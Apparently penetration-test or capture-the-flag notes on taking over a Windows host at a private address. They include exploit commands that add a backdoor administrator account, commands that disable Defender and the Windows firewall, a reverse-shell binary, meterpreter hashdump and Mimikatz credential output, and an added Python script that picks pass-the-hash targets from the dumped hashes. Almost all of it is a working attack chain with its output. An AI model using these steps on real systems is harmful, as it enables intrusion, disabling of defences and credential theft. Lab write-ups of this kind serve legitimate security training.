Using the Exploit to add a new user
proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c "net user /add ipsec TryHarder.1234"
proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c "net localgroup administrators ipsec /add"
proxychains xfreerdp /u:ipsec /v:172.16.1.30 /p:TryHarder.1234
On the Windows system
Finding the flag and loot for ned.flanders_adm (domain user)
whoami /groups
cmd> powershell.exe Start-Process cmd.exe -Verb RunAs
# accepting the UAC prompt gives us a High Mandatory Level token (re-run whoami /groups in the new window to confirm)
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
cmd> netsh advfirewall set allprofiles state off
cmd> netsh advfirewall set currentprofile state off
.\revers.exe
Now in meterpreter
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1002:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1001:aad3b435b51404eeaad3b435b51404ee:de3fc4311cd523e83700640cb95b303b:::
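As an added example that is not part of the original notes: a small parser for the pwdump-style lines that meterpreter's hashdump prints (user:RID:LM:NT:::). It flags accounts whose NT hash is the well-known empty-password value and lists the ones whose hashes are usable for pass-the-hash. The sample input is the hashdump output above; the `SamEntry` class and helper names are my own.

```python
"""Parse meterpreter hashdump (pwdump format) and pick pass-the-hash candidates."""
from dataclasses import dataclass

# LM hash of an empty string: modern Windows stores this when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password: the account has no password set (or is disabled with none).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def pth_candidate(self) -> bool:
        # Pass-the-hash needs a real NT hash; an empty-password account is not worth relaying.
        return not self.empty_password

    @property
    def builtin_administrator(self) -> bool:
        # RID 500 is always the built-in Administrator, whatever it has been renamed to.
        return self.rid == 500


def parse_hashdump(text: str) -> list[SamEntry]:
    """Parse lines of the form user:rid:lmhash:nthash::: (extra trailing fields ignored)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        # skip blank lines and the 'meterpreter > hashdump' prompt if it was pasted along
        if not line or line.startswith("meterpreter"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length in: {line!r}")
        entries.append(SamEntry(user, rid, lm, nt))
    return entries


def pth_targets(entries: list[SamEntry]) -> list[str]:
    """Usernames with a non-empty NT hash, i.e. usable for pass-the-hash."""
    return [e.user for e in entries if e.pth_candidate]


def impacket_hashes_arg(entry: SamEntry) -> str:
    """Format LM:NT the way impacket tools take it on -hashes."""
    return f"{entry.lm}:{entry.nt}"


# constructed sample: the hashdump output from the notes above
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1002:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1001:aad3b435b51404eeaad3b435b51404ee:de3fc4311cd523e83700640cb95b303b:::
"""

if __name__ == "__main__":
    for e in parse_hashdump(SAMPLE):
        tag = "EMPTY" if e.empty_password else impacket_hashes_arg(e)
        print(f"{e.user:<16} rid={e.rid:<5} {'(builtin admin)' if e.builtin_administrator else '':<16} {tag}")
```

Guest and DefaultAccount carry the empty-password NT hash and are normally disabled, so only Administrator, justalocaladmin and the ipsec account we created are worth trying for pass-the-hash against other hosts in the 172.16.1.0/24 range.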
Getting SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Mimikatz
NTLM b0008678126a9a7143961c96161725a4
# extra NTLM hash dumped from LSASS with sekurlsa::logonpasswords; it is not one of the local SAM hashes above, so it belongs to an account that had logged on to the box